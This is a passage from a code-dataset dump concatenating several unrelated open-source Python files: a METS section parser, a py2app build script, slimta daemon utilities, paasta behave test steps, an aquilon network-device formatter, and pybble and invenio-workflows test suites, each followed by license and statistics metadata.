title = section.titleInfo.title.string
if resource_type == 'still image':
return 'image'
elif resource_type == 'text':
# special text section types
if 'advertisement' in genre:
return 'advertisement'
elif 'inhalt' in title.lower():
return 'contents'
# valid sections
elif len(list(section.find_all('relatedItem',
type='constituent'))) > 0:
return 'parent'
elif _test_section(section.parent):
if _test_section(section.parent.parent):
raise MyError('double nesting in section {}, file {}!'
.format(section['ID'], filename))
return 'subsection'
else:
return 'flat'
else:
logger.warning('unknown section {} type in file {}. Resource type: {},'
'genre: {}'
.format(section['ID'], filename, resource_type, genre))
return 'unknown'
def _get_alto_locations(section):
'''returns alto locations as a list. These are used when parsing alto file
'''
areas = section.find_all('area')
if len(areas) == 0:
return None
return [{'file': area['FILEID'], 'loc': area['BEGIN']} for area in areas]
if __name__ == '__main__':
import argparse
import json
parser = argparse.ArgumentParser()
parser.add_argument('--path', '-p', dest='file_path', required=True)
args = parser.parse_args()
res = main(args.file_path)
print(json.dumps(res))
| mit | -3,810,432,262,548,088,300 | 31.798387 | 79 | 0.591345 | false |
itohnobue/domanager | build_pkg_mac.py | 1 | 2220 |
from setuptools import setup
import os, shutil, sys
srcPath = os.path.abspath(os.path.join("source"))
sys.path.append(srcPath)
# Remove the build folder
shutil.rmtree("build", ignore_errors=True)
shutil.rmtree("dist", ignore_errors=True)
APP = ['run.py']
DATA_FILES = [os.path.join("source", "domanager", "resources")]
OPTIONS = {'argv_emulation': True,
'iconfile': os.path.join("source", "domanager",
"resources", "main_logo_color.icns"),
'includes': ["domanager", "sip", "PyQt5.QtCore", "PyQt5.QtWidgets", "PyQt5.QtGui"],
"qt_plugins": ["imageformats/*", "platforms/*"],
'excludes': ["numpy", "sqlalchemy", 'h5py', 'cx_Freeze', 'coverage',
'Enginio', 'PyQt5.QtBluetooth', 'PyQt5.QtHelp', 'PyQt5.QtMultimediaWidgets',
'PyQt5.QtWebChannel', 'PyQt5.QtWebEngineWidgets',
'PyQt5.QtPositioning', 'PyQt5.QtQml', 'PyQt5.QtQuick', 'PyQt5.QtQuickWidgets',
'PyQt5.QtSensors', 'PyQt5.QtSerialPort', 'PyQt5.QtWebKitWidgets',
'PyQt5.QtDesigner', 'PyQt5.QtMultimedia', 'PyQt5.QtOpenGL',
'PyQt5.QtSvg', 'PyQt5.QtSql', 'PyQt5.QtXml', 'PyQt5.QtXmlPatterns',
'PyQt5.QtWebKit', 'PyQt5.QtTest', 'PyQt5.QtScript', 'PyQt5.QtScriptTools',
'PyQt5.QtDeclarative', 'PyQt5.QtWebSockets',
'_gtkagg', '_tkagg', 'bsddb', 'curses', 'pywin.debugger',
'pywin.debugger.dbgcon', 'pywin.dialogs', 'tcl', 'test',
'Tkinter', 'xml', 'pywinauto.tests', 'unittest', 'Tkconstants',
'pdb', 'dummy_thread', 'doctest', 'PIL', 'PpmImagePlugin',
'BmpImagePlugin', 'GifImagePlugin', 'GimpGradientFile',
'GimpPaletteFile', 'JpegImagePlugin', 'PngImagePlugin',
'TiffImagePlugin', 'TiffTags', 'Image', 'ImageGrab', 'bz2'],
'plist': {'LSUIElement': True},
}
setup(
name = "DO_Manager",
app=APP,
data_files=DATA_FILES,
options={'py2app': OPTIONS},
setup_requires=['py2app'],
)
| gpl-2.0 | 4,955,059,193,898,313,000 | 44.306122 | 102 | 0.549099 | false |
fisele/slimta-abusix | slimta/system.py | 1 | 4772 | # Copyright (c) 2012 Ian C. Good
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
"""Contains functions to simplify the usual daemonization procedures for long-
running processes.
"""
from __future__ import absolute_import
import os
import os.path
import sys
from pwd import getpwnam
from grp import getgrnam
__all__ = ['daemonize', 'redirect_stdio', 'drop_privileges', 'PidFile']
def daemonize():
"""Daemonizes the current process using the standard double-fork.
This function does not affect standard input, output, or error.
:returns: The PID of the daemonized process.
"""
# Fork once.
try:
pid = os.fork()
if pid > 0:
os._exit(0)
except OSError:
return
# Set some options to detach from the terminal.
os.chdir('/')
os.setsid()
os.umask(0)
# Fork again.
try:
pid = os.fork()
if pid > 0:
os._exit(0)
except OSError:
return
os.setsid()
return os.getpid()
def redirect_stdio(stdout=None, stderr=None, stdin=None):
"""Redirects standard output, error, and input to the given
filenames. Standard output and error are opened in append-mode, and
standard input is opened in read-only mode. Leaving any parameter
blank leaves that stream alone.
:param stdout: filename to append the standard output stream into.
:param stderr: filename to append the standard error stream into.
:param stdin: filename to read from as the standard input stream.
"""
# Find the OS /dev/null equivalent.
nullfile = getattr(os, 'devnull', '/dev/null')
# Redirect all standard I/O to /dev/null.
sys.stdout.flush()
sys.stderr.flush()
si = open(stdin or nullfile, 'r')
so = open(stdout or nullfile, 'a+')
se = open(stderr or nullfile, 'a+', 0)
os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
def drop_privileges(user=None, group=None):
"""Uses the system calls :func:`~os.setuid` and :func:`~os.setgid` to drop
root privileges to the given user and group. This is useful for security
purposes, once root-only ports like 25 are opened.
:param user: user name (from /etc/passwd) or UID.
:param group: group name (from /etc/group) or GID.
"""
if group:
try:
gid = int(group)
except ValueError:
gid = getgrnam(group).gr_gid
os.setgid(gid)
if user:
try:
uid = int(user)
except ValueError:
uid = getpwnam(user).pw_uid
os.setuid(uid)
class PidFile(object):
""".. versionadded:: 0.3.13
Context manager which creates a PID file containing the current process id,
runs the context, and then removes the PID file.
An :py:exc:`OSError` exceptions when creating the PID file will be
propogated without executing the context.
:param filename: The filename to use for the PID file. If ``None`` is
given, the context is simply executed with no PID file
created.
"""
def __init__(self, filename=None):
super(PidFile, self).__init__()
if not filename:
self.filename = None
else:
self.filename = os.path.abspath(filename)
def __enter__(self):
if self.filename:
with open(self.filename, 'w') as pid:
pid.write('{0}\n'.format(os.getpid()))
return self.filename
def __exit__(self, exc_type, exc_value, traceback):
if self.filename:
try:
os.unlink(self.filename)
except OSError:
pass
# vim:et:fdm=marker:sts=4:sw=4:ts=4
| mit | 1,100,777,063,778,634,200 | 29.589744 | 79 | 0.649413 | false |
Yelp/paasta | general_itests/steps/local_run_steps.py | 1 | 3335 | # Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from behave import given
from behave import then
from behave import when
from path import Path
from paasta_tools.utils import _run
@given("a simple service to test")
def given_simple_service(context):
context.fake_service_name = "fake_simple_service"
assert os.path.isfile(os.path.join(context.fake_service_name, "Dockerfile"))
assert os.path.isfile(os.path.join(context.fake_service_name, "Makefile"))
@when(
"we run paasta local-run on a Marathon service in non-interactive mode "
'with environment variable "{var}" set to "{val}"'
)
def non_interactive_local_run(context, var, val):
with Path("fake_simple_service"):
# The local-run invocation here is designed to run and return a sentinel
# exit code that we can look out for. It also sleeps a few seconds
# because the local-run code currently crashes when the docker
# container dies before it gets a chance to lookup the containerid
# (which causes jenkins flakes) The sleep can be removed once local-run
# understands that containers can die quickly.
localrun_cmd = (
"paasta local-run "
"--yelpsoa-config-root ../fake_soa_configs_local_run/ "
"--service fake_simple_service "
"--cluster test-cluster "
"--instance main "
"--build "
"""--cmd '/bin/sh -c "echo \\"%s=$%s\\" && sleep 2s && exit 42"' """
% (var, var)
)
context.return_code, context.output = _run(command=localrun_cmd, timeout=90)
@then(
'we should see the environment variable "{var}" with the value "{val}" in the output'
)
def env_var_in_output(context, var, val):
assert f"{var}={val}" in context.output
@when("we run paasta local-run on an interactive job")
def local_run_on_adhoc_job(context):
with Path("fake_simple_service"):
local_run_cmd = (
"paasta local-run "
"--yelpsoa-config-root ../fake_soa_configs_local_run/ "
"--service fake_simple_service "
"--cluster test-cluster "
"--instance sample_adhoc_job "
"--build "
)
context.return_code, context.output = _run(command=local_run_cmd, timeout=90)
@when("we run paasta local-run on a tron action")
def local_run_on_tron_action(context):
with Path("fake_simple_service"):
local_run_cmd = (
"paasta local-run "
"--yelpsoa-config-root ../fake_soa_configs_local_run/ "
"--service fake_simple_service "
"--cluster test-cluster "
"--instance sample_tron_job.action1 "
"--build "
)
context.return_code, context.output = _run(command=local_run_cmd, timeout=90)
| apache-2.0 | 1,040,887,111,290,571,400 | 36.897727 | 89 | 0.644378 | false |
quattor/aquilon | lib/aquilon/worker/formats/network_device.py | 1 | 6711 | # -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2010,2011,2012,2013,2014,2015,2016,2017,2018 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""NetworkDevice formatter."""
from collections import defaultdict
from operator import attrgetter
from aquilon.aqdb.model import NetworkDevice
from aquilon.worker.formats.formatters import ObjectFormatter
from aquilon.worker.formats.hardware_entity import HardwareEntityFormatter
from aquilon.exceptions_ import ProtocolError
class NetworkDeviceFormatter(HardwareEntityFormatter):
def header_raw(self, device, details, indent="", embedded=True,
indirect_attrs=True):
details.append(indent + " Switch Type: %s" % device.switch_type)
def format_raw(self, device, indent="", embedded=True,
indirect_attrs=True):
details = [super(NetworkDeviceFormatter, self).format_raw(device, indent)]
for slot in device.chassis_slot:
details.append(indent + " {0:c}: {0!s}".format(slot.chassis))
details.append(indent + " Slot: %d" % slot.slot_number)
ports = defaultdict(list)
for om in device.observed_macs:
ports[om.port].append(om)
for port in sorted(ports):
# Show most recent data first, otherwise sort by MAC address. sort()
# is stable so we can call it multiple times
ports[port].sort(key=attrgetter('mac_address'))
ports[port].sort(key=attrgetter('last_seen'), reverse=True)
details.append(indent + " Port: %s" % port)
for om in ports[port]:
details.append(indent + " MAC: %s, created: %s, last seen: %s" %
(om.mac_address, om.creation_date, om.last_seen))
for pg in device.port_groups:
details.append(indent + " VLAN %d: %s" % (pg.network_tag,
pg.network.ip))
details.append(indent + " Created: %s" % pg.creation_date)
if device.host:
details.append(self.redirect_raw_host_details(device.host))
return "\n".join(details)
def csv_fields(self, device):
base_details = [device.fqdn,
device.primary_ip,
device.switch_type,
device.location.rack.name if device.location.rack else None,
device.location.building.name,
device.model.vendor.name,
device.model.name,
device.serial_no]
if not device.interfaces:
yield base_details + [None, None]
else:
for interface in device.interfaces:
yield base_details + [interface.name, interface.mac]
def fill_proto(self, device, skeleton, embedded=True,
indirect_attrs=True):
skeleton.primary_name = str(device.primary_name)
if indirect_attrs:
self._fill_hardware_proto(device, skeleton.hardware)
self._fill_system_proto(device.host, skeleton.system)
def _fill_hardware_proto(self, hwent, skeleton, embedded=True,
indirect_attrs=True):
skeleton.hardware_type = skeleton.NETWORK_DEVICE
skeleton.label = hwent.label
if hwent.serial_no:
skeleton.serial_no = hwent.serial_no
self.redirect_proto(hwent.model, skeleton.model, indirect_attrs=False)
self.redirect_proto(hwent.location, skeleton.location, indirect_attrs=False)
if indirect_attrs:
for iface in sorted(hwent.interfaces, key=attrgetter('name')):
int_msg = skeleton.interfaces.add()
int_msg.device = iface.name
self.redirect_proto(iface, int_msg)
self._fill_address_assignment_proto(iface, int_msg.address_assignments)
def _fill_address_assignment_proto(self, iface, skeleton, embedded=True,
indirect_attrs=True):
for addr in iface.assignments:
addr_msg = skeleton.add()
if addr.assignment_type == 'standard':
addr_msg.assignment_type = addr_msg.STANDARD
elif addr.assignment_type == 'shared':
addr_msg.assignment_type = addr_msg.SHARED
else:
raise ProtocolError("Unknown address assignmment type %s." %
addr.assignment_type)
if addr.label:
addr_msg.label = addr.label
addr_msg.ip = str(addr.ip)
addr_msg.fqdn.extend([str(fqdn) for fqdn in addr.fqdns])
for dns_record in addr.dns_records:
if dns_record.alias_cnt:
addr_msg.aliases.extend([str(a.fqdn) for a in
dns_record.all_aliases])
if hasattr(addr, "priority"):
addr_msg.priority = addr.priority
def _fill_system_proto(self, host, skeleton, embedded=True,
indirect_attrs=True):
self.redirect_proto(host.branch, skeleton.domain)
skeleton.status = host.status.name
self.redirect_proto(host.personality_stage, skeleton.personality)
self.redirect_proto(host.operating_system, skeleton.operating_system)
if host.cluster and not embedded:
skeleton.cluster = host.cluster.name
if host.resholder:
self.redirect_proto(host.resholder.resources, skeleton.resources)
self.redirect_proto(host.services_used, skeleton.services_used,
indirect_attrs=False)
self.redirect_proto([srv.service_instance for srv in host.services_provided],
skeleton.services_provided, indirect_attrs=False)
skeleton.owner_eonid = host.effective_owner_grn.eon_id
for grn_rec in host.grns:
map = skeleton.eonid_maps.add()
map.target = grn_rec.target
map.eonid = grn_rec.eon_id
ObjectFormatter.handlers[NetworkDevice] = NetworkDeviceFormatter()
| apache-2.0 | 1,171,513,508,783,954,400 | 42.577922 | 87 | 0.606318 | false |
smurfix/pybble | test/test_app_run.py | 1 | 1520 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, division, unicode_literals
##
## This is part of Pybble, a WMS (Whatever Management System) based on
## Jinja2/Haml, Werkzeug, Flask, and Optimism.
##
## Pybble is Copyright © 2009-2014 by Matthias Urlichs <matthias@urlichs.de>,
## it is licensed under the GPLv3. See the file `README.md` for details,
## including an optimistic statements by the author.
##
## This paragraph is auto-generated and may self-destruct at any time,
## courtesy of "make update". The original is in ‘utils/_boilerplate.py’.
## Thus, please do not remove the next line, or insert any blank lines.
##BP
import pytest
from pybble.manager.main import RootManager
from pybble.core.models.site import Site
from .base import WebTC
from webunit.webunittest import WebTestCase
from .manager import run
def ap_test():
# set a class attribute on the invoking test context
run("mgr -Dt site add AppTest _test atest")
class AppRunTestCase(WebTC,WebTestCase):
# def setupData(self):
# super(AppRunTestCase,self).setupData()
# self.run_manager("mgr -Dt site new AppTest _test atest")
def test_one(self):
self.once(ap_test)
assert Site.q.get_by(name="AppTest").domain == "atest"
self.assertContent("http://atest/one","Number One")
def test_two(self):
self.once(ap_test)
self.assertContent("http://atest/two","Number Two")
def test_three(self):
self.once(ap_test)
self.assertContent("http://atest/three","Number Three")
| gpl-3.0 | 624,786,411,729,272,300 | 31.934783 | 82 | 0.728053 | false |
tiborsimko/invenio-workflows | tests/test_workflows.py | 1 | 31366 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2013, 2014, 2015 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Unit tests for workflows."""
from __future__ import absolute_import
import logging
import random
import time
from flask_registry import ImportPathRegistry
from invenio_testing import InvenioTestCase
TEST_PACKAGES = [
'invenio_workflows',
'demo_package',
]
class WorkflowTasksTestCase(InvenioTestCase):
""" Workflow class for testing."""
def create_registries(self):
"""Create registries for testing."""
from invenio_workflows.registry import WorkflowsRegistry
self.app.extensions['registry']['workflows.tests'] = \
ImportPathRegistry(initial=TEST_PACKAGES)
self.app.extensions['registry']['workflows'] = \
WorkflowsRegistry(
'workflows', app=self.app, registry_namespace='workflows.tests'
)
self.app.extensions['registry']['workflows.actions'] = \
WorkflowsRegistry(
'actions', app=self.app, registry_namespace='workflows.tests'
)
def cleanup_registries(self):
"""Clean registries for testing."""
del self.app.extensions['registry']['workflows.tests']
del self.app.extensions['registry']['workflows']
del self.app.extensions['registry']['workflows.actions']
class WorkflowTasksTestAPI(WorkflowTasksTestCase):
""" Test basic workflow API."""
def setUp(self):
"""Setup tests."""
self.create_registries()
self.test_data = {}
self.id_workflows = []
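        # Raw OAI-PMH (arXiv) ListRecords response kept as sample input data.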
self.recxml = """<?xml version="1.0" encoding="UTF-8"?>
<OAI-PMH xmlns="http://www.openarchives.org/OAI/2.0/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/ http://www.openarchives.org/OAI/2.0/OAI-PMH.xsd">
<responseDate>2013-04-03T13:56:49Z</responseDate>
<request verb="ListRecords" from="2013-03-25" metadataPrefix="arXiv" set="physics:astro-ph">http://export.arxiv.org/oai2</request>
<ListRecords>
<record>
<header>
<identifier>oai:arXiv.org:0801.3931</identifier>
<datestamp>2013-03-26</datestamp>
<setSpec>physics:astro-ph</setSpec>
</header>
<metadata>
<arXiv xmlns="http://arxiv.org/OAI/arXiv/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://arxiv.org/OAI/arXiv/ http://arxiv.org/OAI/arXiv.xsd">
<id>0801.3931</id><created>2008-01-25</created><authors><author><keyname>Manos</keyname><forenames>T.</forenames></author><author><keyname>Athanassoula</keyname><forenames>E.</forenames></author></authors><title>Dynamical study of 2D and 3D barred galaxy models</title><categories>astro-ph</categories><comments>8 pages, 3 figures, to appear in the proceedings of the international
conference "Chaos in Astronomy", Athens, Greece (talk contribution)</comments><journal-ref>Chaos in Astronomy Astrophysics and Space Science Proceedings
2009, pp 115-122</journal-ref><doi>10.1007/978-3-540-75826-6_11</doi><abstract> We study the dynamics of 2D and 3D barred galaxy analytical models, focusing
on the distinction between regular and chaotic orbits with the help of the
Smaller ALigment Index (SALI), a very powerful tool for this kind of problems.
We present briefly the method and we calculate the fraction of chaotic and
regular orbits in several cases. In the 2D model, taking initial conditions on
a Poincar\'{e} $(y,p_y)$ surface of section, we determine the fraction of
regular and chaotic orbits. In the 3D model, choosing initial conditions on a
cartesian grid in a region of the $(x, z, p_y)$ space, which in coordinate
space covers the inner disc, we find how the fraction of regular orbits changes
as a function of the Jacobi constant. Finally, we outline that regions near the
$(x,y)$ plane are populated mainly by regular orbits. The same is true for
regions that lie either near to the galactic center, or at larger relatively
distances from it.
</abstract></arXiv>
</metadata>
</record>
</ListRecords>
</OAI-PMH>
"""
def tearDown(self):
""" Clean up created objects."""
from invenio_workflows.models import Workflow
self.delete_objects(
Workflow.get(Workflow.module_name == "unit_tests").all())
self.cleanup_registries()
def test_halt(self):
"""Test halt task."""
from invenio_workflows.registry import workflows
from invenio_workflows.api import start
from invenio_workflows.engine import WorkflowStatus
from invenio_workflows.models import (BibWorkflowObjectLog,
ObjectVersion)
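        # Minimal one-task workflow that halts immediately, so the engine and
        # object should end up HALTED/WAITING without logging any errors.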
def halt_engine(obj, eng):
return eng.halt("Test")
class HaltTest(object):
workflow = [halt_engine]
workflows['halttest'] = HaltTest
data = [set(('somekey', 'somevalue'))]
eng = start('halttest', data, module_name="unit_tests")
idx, obj = list(eng.getObjects())[0]
self.assertEqual(ObjectVersion.WAITING, obj.version)
self.assertEqual(WorkflowStatus.HALTED, eng.status)
self.assertEqual(0, BibWorkflowObjectLog.get(
id_object=obj.id, log_type=logging.ERROR).count())
def test_halt_in_branch(self):
"""Test halt task when in conditionnal branch."""
from workflow.patterns import IF_ELSE
from invenio_workflows.registry import workflows
from invenio_workflows.api import start
from invenio_workflows.engine import WorkflowStatus
from invenio_workflows.models import (BibWorkflowObjectLog,
ObjectVersion)
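        # Both IF_ELSE branches halt, so halting must also work while the
        # engine is executing inside a conditional branch.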
def always_true(obj, eng):
return True
def halt_engine(obj, eng):
return eng.halt("Test")
class BranchTest(object):
workflow = [
IF_ELSE(always_true, [halt_engine], [halt_engine])
]
workflows['branchtest'] = BranchTest
data = [set(('somekey', 'somevalue'))]
eng = start('branchtest', data, module_name="unit_tests")
idx, obj = list(eng.getObjects())[0]
self.assertEqual(ObjectVersion.WAITING, obj.version)
self.assertEqual(WorkflowStatus.HALTED, eng.status)
self.assertEqual(0, BibWorkflowObjectLog.get(
id_object=obj.id, log_type=logging.ERROR).count())
def test_object_creation_complete(self):
"""
Test status of object before/after workflow.
When created before calling API, with "high" test-data that will
make the workflow complete.
"""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.engine import WorkflowStatus
from invenio_workflows.api import start
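        # A freshly saved object starts as INITIAL; a successful run should
        # leave it COMPLETED with the transformed data.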
test_object = BibWorkflowObject()
test_object.set_data(20)
test_object.save()
self.assertEqual(ObjectVersion.INITIAL, test_object.version)
self.assertEqual(None, test_object.id_parent)
self.assertEqual(20, test_object.get_data())
engine = start('demo_workflow', [test_object],
module_name="unit_tests")
self.assertEqual(38, test_object.get_data())
self.assertEqual(None, test_object.id_parent)
self.assertEqual(WorkflowStatus.COMPLETED, engine.status)
self.assertEqual(ObjectVersion.COMPLETED, test_object.version)
def test_object_creation_halt(self):
"""Test status of object before/after workflow.
When created before calling API, with "low" test-data that will
make the workflow halt.
"""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.api import start
from invenio_workflows.engine import WorkflowStatus
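        # A low value makes demo_workflow halt, so the object should stay in
        # WAITING with its original data and the engine should be HALTED.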
test_object = BibWorkflowObject()
test_object.set_data(2)
test_object.save()
self.assertEqual(ObjectVersion.INITIAL, test_object.version)
self.assertEqual(None, test_object.id_parent)
self.assertEqual(2, test_object.get_data())
engine = start('demo_workflow', [test_object],
module_name="unit_tests")
self.assertEqual(2, test_object.get_data())
self.assertEqual(ObjectVersion.WAITING, test_object.version)
self.assertEqual(WorkflowStatus.HALTED, engine.status)
def test_workflow_engine_instantiation(self):
"""Check the proper init of the Workflow and BibWorkflowEngine."""
from invenio_workflows.models import Workflow
from invenio_workflows.engine import BibWorkflowEngine
from uuid import uuid1 as new_uuid
test_workflow = Workflow(name='demo_workflow', uuid=new_uuid(),
id_user=0, module_name="Unknown", )
test_workflow_engine = BibWorkflowEngine(name=test_workflow.name,
uuid=test_workflow.uuid)
self.assertEqual(test_workflow.name, test_workflow_engine.name)
def test_workflow_restarts(self):
"""Check if all is well when restarting a workflow several times."""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.api import start, continue_oid
from invenio_workflows.engine import WorkflowStatus
test_object = BibWorkflowObject()
random.seed(time.time())
tries = 15
test_object.set_data(tries)
test_object.save()
engine = start('demo_workflow_hardcore', [test_object],
module_name="unit_tests")
for i in range(0, tries):
self.assertEqual(engine.status, WorkflowStatus.HALTED)
for my_object_b in engine.getObjects():
engine = continue_oid(my_object_b[1].id, "restart_task")
self.assertEqual(0, test_object.get_data())
self.assertEqual(ObjectVersion.COMPLETED, test_object.version)
self.assertEqual(WorkflowStatus.COMPLETED, engine.status)
def test_workflow_object_creation(self):
"""Test to see if the right snapshots or object versions are created."""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.api import start
initial_data = 22
final_data = 40
test_object = BibWorkflowObject()
test_object.set_data(initial_data)
test_object.save()
workflow = start(workflow_name="demo_workflow",
data=[test_object],
module_name="unit_tests")
# Get parent object of the workflow we just ran
initial_object = BibWorkflowObject.query.filter(
BibWorkflowObject.id_parent == test_object.id).one()
all_objects = BibWorkflowObject.query.filter(
BibWorkflowObject.id_workflow == workflow.uuid
).order_by(BibWorkflowObject.id).all()
# There should only be 2 objects (initial, final)
self.assertEqual(2, len(all_objects))
self.assertEqual(test_object.id, initial_object.id_parent)
self.assertEqual(ObjectVersion.INITIAL, initial_object.version)
self.assertEqual(initial_data, initial_object.get_data())
self.assertEqual(final_data, test_object.get_data())
self.assertEqual(ObjectVersion.COMPLETED, test_object.version)
def test_workflow_object_creation_simple(self):
"""Test to see if the right snapshots or object versions are created."""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.api import start
initial_data = 22
final_data = 40
workflow = start(workflow_name="demo_workflow",
data=[initial_data],
module_name="unit_tests")
# Get parent object of the workflow we just ran
initial_object = BibWorkflowObject.query.filter(
BibWorkflowObject.id_workflow == workflow.uuid,
BibWorkflowObject.id_parent == None).first() # noqa E711
test_object = BibWorkflowObject.query.filter(
BibWorkflowObject.id_workflow == workflow.uuid,
BibWorkflowObject.id_parent == initial_object.id).first()
all_objects = BibWorkflowObject.query.filter(
BibWorkflowObject.id_workflow == workflow.uuid
).order_by(BibWorkflowObject.id).all()
# There should only be 2 objects (initial, final)
self.assertEqual(2, len(all_objects))
self.assertEqual(test_object.id_parent, initial_object.id)
self.assertEqual(ObjectVersion.COMPLETED, initial_object.version)
self.assertEqual(final_data, initial_object.get_data())
self.assertEqual(initial_data, test_object.get_data())
self.assertEqual(ObjectVersion.INITIAL, test_object.version)
def test_workflow_complex_run(self):
"""Test running workflow with several data objects."""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.api import start
self.test_data = [1, 20]
final_data = [1, 38]
workflow = start(workflow_name="demo_workflow",
data=self.test_data,
module_name="unit_tests")
# Get parent objects of the workflow we just ran
objects = BibWorkflowObject.query.filter(
BibWorkflowObject.id_workflow == workflow.uuid,
BibWorkflowObject.id_parent == None # noqa E711
).order_by(BibWorkflowObject.id).all()
        # Let's check that we found anything.
        # There should only be two parent objects
self.assertEqual(2, len(objects))
all_objects = BibWorkflowObject.query.filter(
BibWorkflowObject.id_workflow == workflow.uuid
).order_by(BibWorkflowObject.id).all()
self.assertEqual(4, len(all_objects))
for obj in objects:
# The child object should have the final or halted version
self.assertTrue(obj.child_objects[0].version in (ObjectVersion.INITIAL,
ObjectVersion.HALTED))
# Making sure the final data is correct
self.assertTrue(obj.get_data() in final_data)
self.assertTrue(obj.child_objects[0].get_data() in self.test_data)
def test_workflow_approve_step(self):
"""Test runnning a record ingestion workflow with a action step."""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.engine import WorkflowStatus
from invenio_workflows.api import start
initial_data = 1
workflow = start(workflow_name="demo_workflow_approve",
data=[initial_data],
module_name="unit_tests")
# Get objects of the workflow we just ran
objects = BibWorkflowObject.query.filter(
BibWorkflowObject.id_workflow == workflow.uuid,
BibWorkflowObject.id_parent == None # noqa E711
).order_by(BibWorkflowObject.id).all()
self._check_workflow_execution(objects, initial_data)
all_objects = BibWorkflowObject.query.filter(
BibWorkflowObject.id_workflow == workflow.uuid
).order_by(BibWorkflowObject.id).all()
self.assertEqual(2, len(all_objects))
self.assertEqual(WorkflowStatus.HALTED, workflow.status)
current = BibWorkflowObject.query.filter(
BibWorkflowObject.id_workflow == workflow.uuid,
BibWorkflowObject.version == ObjectVersion.HALTED
).one()
self.assertEqual(current.get_action(), "approval")
def test_workflow_for_halted_object(self):
"""Test workflow with continuing a halted object."""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.api import start, continue_oid
from invenio_workflows.engine import WorkflowStatus
current = BibWorkflowObject()
current.set_data(1)
current.save()
workflow = start(workflow_name="demo_workflow_approve",
data=[current],
module_name="unit_tests")
self.assertEqual(WorkflowStatus.HALTED, workflow.status)
self.assertEqual(ObjectVersion.HALTED, current.version)
workflow = continue_oid(current.id,
module_name="unit_tests")
self.assertEqual(WorkflowStatus.COMPLETED, workflow.status)
self.assertEqual(ObjectVersion.COMPLETED, current.version)
def test_workflow_for_finished_object(self):
"""Test starting workflow with finished object given."""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.api import start
from invenio_workflows.engine import WorkflowStatus
current = BibWorkflowObject()
current.set_data(20)
current.save()
workflow = start(workflow_name="demo_workflow",
data=[current],
module_name="unit_tests")
self.assertEqual(WorkflowStatus.COMPLETED, workflow.status)
self.assertEqual(ObjectVersion.COMPLETED, current.version)
self.assertEqual(38, current.get_data())
previous = BibWorkflowObject.query.get(current.id)
workflow_2 = start(workflow_name="demo_workflow",
data=[previous],
module_name="unit_tests")
self.assertEqual(WorkflowStatus.COMPLETED, workflow_2.status)
self.assertEqual(ObjectVersion.COMPLETED, previous.version)
self.assertEqual(56, previous.get_data())
def test_logging_for_workflow_objects_without_workflow(self):
"""Test run a virtual object out of a workflow for test purpose."""
from invenio_workflows.models import (BibWorkflowObject,
BibWorkflowObjectLog,
ObjectVersion)
initial_data = 20
obj_init = BibWorkflowObject(
id_workflow=None,
version=ObjectVersion.INITIAL)
obj_init.set_data(initial_data)
obj_init.save()
err_msg = "This is an error message"
info_msg = "This is an info message"
obj_init.log.info(info_msg)
obj_init.log.error("This is an error message")
